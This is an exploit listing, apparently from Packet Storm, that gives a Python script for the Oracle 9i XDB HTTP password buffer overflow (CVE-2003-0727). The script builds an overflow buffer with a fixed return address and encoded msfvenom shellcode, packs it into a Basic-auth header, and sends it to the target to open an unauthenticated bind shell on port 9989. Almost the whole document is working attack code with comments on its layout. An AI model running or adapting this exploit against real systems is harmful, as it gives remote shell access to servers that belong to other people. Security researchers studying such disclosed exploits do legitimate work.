
Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow

2017-09-2600:00:00
Charles Dardaman
packetstormsecurity.com

`#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow  
#Date: 09/25/2017  
#Exploit Author: Charles Dardaman  
#Twitter: https://twitter.com/CharlesDardaman  
#Website: http://www.dardaman.com  
#Version:9.2.0.1  
#Tested on: Windows 2000 SP4  
#CVE: CVE-2003-0727 (HTTP Basic-auth password variant; the oversized value is carried in the Authorization header built below)  
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/  
  
#!/usr/bin/python  
  
  
import socket, sys, base64  
  
#usage: python oracle9i_xdb_pass.py <target ip> <target port>   (invoke python explicitly: the shebang above is not on line 1 of this listing)  
  
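# ---------------------------------------------------------------------------
# Overflow buffer layout (offsets are bytes into the *decoded* Basic-auth
# value; the server splits it on the first ':' into user name and password,
# so everything after "AAAA:" lands in the password field):
#
#   offset  len  content
#        0    5  "AAAA:"            user name + separator
#        5  442  "B" * 442          filler up to the overwritten return address
#      447    2  "\xeb\x64"         jmp short +0x64 (forward into the NOP sled)
#      449    2  NOP * 2
#      451    4  ret                0x60616d46, little-endian
#      455  266  NOP * 266          sled
#      721    2  "\xeb\x10"         jmp short +0x10 (second hop inside the sled)
#      723  109  NOP * 109          sled
#      832  362  payload            7-byte stack adjust + 355-byte bind shell
#     1194   38  NOP * 38           pad so the buffer is always 1232 bytes
#
# Everything is handled as bytes so the script runs unchanged under Python 2
# and Python 3 (the original used str and only worked on Python 2).
# ---------------------------------------------------------------------------

# Return address in little-endian byte order (0x60616d46).  Inherited from
# exploit-db 16809 and only valid for the build the header says was tested
# (Oracle 9.2.0.1 on Windows 2000 SP4); against any other build the most
# likely outcome is just a crash of the XDB HTTP listener.  Note it contains
# no 0x00 byte -- a replacement must not either, for the same reason the
# shellcode below was generated with -b "\x00".
ret = b"\x46\x6d\x61\x60"
nop = b"\x90"

# Prepended to the shellcode: `add esp, 0xffffefff` (81 c4 ff ef ff ff)
# followed by `inc esp` (44), i.e. esp -= 0x1000.  Presumably this moves the
# stack pointer away from the buffer so the decoder stub's own stack writes
# cannot clobber the shellcode it is still decoding -- TODO confirm under a
# debugger on the tested build.
pre = b"\x81\xc4\xff\xef\xff\xff\x44"

# msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai
# 355 bytes.  0x00 is excluded presumably because the decoded password is
# handled as a C string on the server side.
#
# NOTE(security): windows/shell_bind_tcp is an *unauthenticated* bind shell.
# Once it is running, anyone who can reach TCP/9989 on the target gets a
# shell in the context of the exploited Oracle process, not just the tester.
# Use only against systems you are authorised to test, and kill the listener
# when done.
BIND_PORT = 9989
shellcode = (
    b"\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"
    b"\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"
    b"\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"
    b"\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"
    b"\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"
    b"\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"
    b"\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"
    b"\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"
    b"\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"
    b"\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"
    b"\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"
    b"\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"
    b"\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"
    b"\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"
    b"\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"
    b"\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"
    b"\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"
    b"\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"
    b"\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"
    b"\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"
    b"\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"
    b"\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"
    b"\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"
    b"\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"
    b"\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"
    b"\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"
    b"\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"
    b"\x98\xae\xd9\xba"
)
# Stack adjust + encoded shell, exactly as the original concatenated them.
payload = pre + shellcode

# Size of the NOP-padded slot the payload occupies at the end of the buffer.
PAYLOAD_SLOT = 400
CONNECT_TIMEOUT = 10  # seconds; the original blocked forever on an unreachable host


def build_exploit(payload=payload):
    """Return the raw (not yet base64-encoded) overflow buffer.

    Args:
        payload: shellcode to place in the 400-byte slot; defaults to the
            bind shell above.  Swapping it in is the supported way to change
            the payload -- the rest of the layout stays fixed.

    Returns:
        bytes, always 1232 long for a payload that fits the slot.

    Raises:
        ValueError: if payload is longer than PAYLOAD_SLOT.  The original
            silently produced an empty pad here (nop * negative == b"") and
            grew the buffer, which changes the overflow layout without
            telling the operator.
    """
    pad = PAYLOAD_SLOT - len(payload)
    if pad < 0:
        raise ValueError(
            "payload is %d bytes, but the slot holds at most %d"
            % (len(payload), PAYLOAD_SLOT)
        )
    return b"".join([
        b"AAAA:",
        b"B" * 442,
        b"\xeb\x64",    # jmp short +0x64
        nop * 2,
        ret,
        nop * 266,
        b"\xeb\x10",    # jmp short +0x10
        nop * 109,
        payload,
        nop * pad,
    ])


def build_request(rhost, rport, exploit=None):
    """Return the HTTP/1.1 GET that carries the overflow.

    The buffer is base64-encoded into the `Authorization: Basic` header
    (byte-identical to the original request); the XDB HTTP listener decodes
    it and the oversized password is what overflows.

    Args:
        rhost: target host, used verbatim in the Host header.
        rport: target port, used in the Host header.
        exploit: raw buffer to encode; defaults to build_exploit().
    """
    if exploit is None:
        exploit = build_exploit()
    host = ("%s:%d" % (rhost, rport)).encode("ascii")
    return (
        b"GET / HTTP/1.1\r\n"
        + b"Host: " + host + b"\r\n"
        + b"Authorization: Basic " + base64.b64encode(exploit) + b"\r\n"
        + b"\r\n"
    )


def main(argv=None):
    """Parse `<target ip> <target port>`, send the request once, return an exit code.

    Fire-and-forget: the connection is closed right after the request and no
    response is read, so the only way to tell whether it worked is to connect
    to BIND_PORT on the target afterwards (a failed attempt most likely shows
    up as the XDB HTTP listener going away).

    Args:
        argv: argument list without the program name; defaults to sys.argv[1:].

    Returns:
        0 on a sent request, 1 on a socket error, 2 on bad arguments.
    """
    args = sys.argv[1:] if argv is None else argv
    if len(args) != 2:
        sys.stderr.write("usage: %s <target ip> <target port>\n" % sys.argv[0])
        return 2
    rhost = args[0]
    try:
        rport = int(args[1])
        if not 0 < rport < 65536:
            raise ValueError(args[1])
    except ValueError:
        sys.stderr.write("invalid port: %r\n" % (args[1],))
        return 2

    request = build_request(rhost, rport)
    print("Attacking %s:%d" % (rhost, rport))

    # create_connection() with a timeout so an unreachable host fails instead
    # of hanging; sendall() because send() may return after a partial write.
    try:
        s = socket.create_connection((rhost, rport), timeout=CONNECT_TIMEOUT)
        try:
            s.sendall(request)
        finally:
            s.close()
    except socket.error as err:
        sys.stderr.write("connection to %s:%d failed: %s\n" % (rhost, rport, err))
        return 1

    print("Try to connect on port %d." % BIND_PORT)
    return 0


if __name__ == "__main__":
    sys.exit(main())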
  
`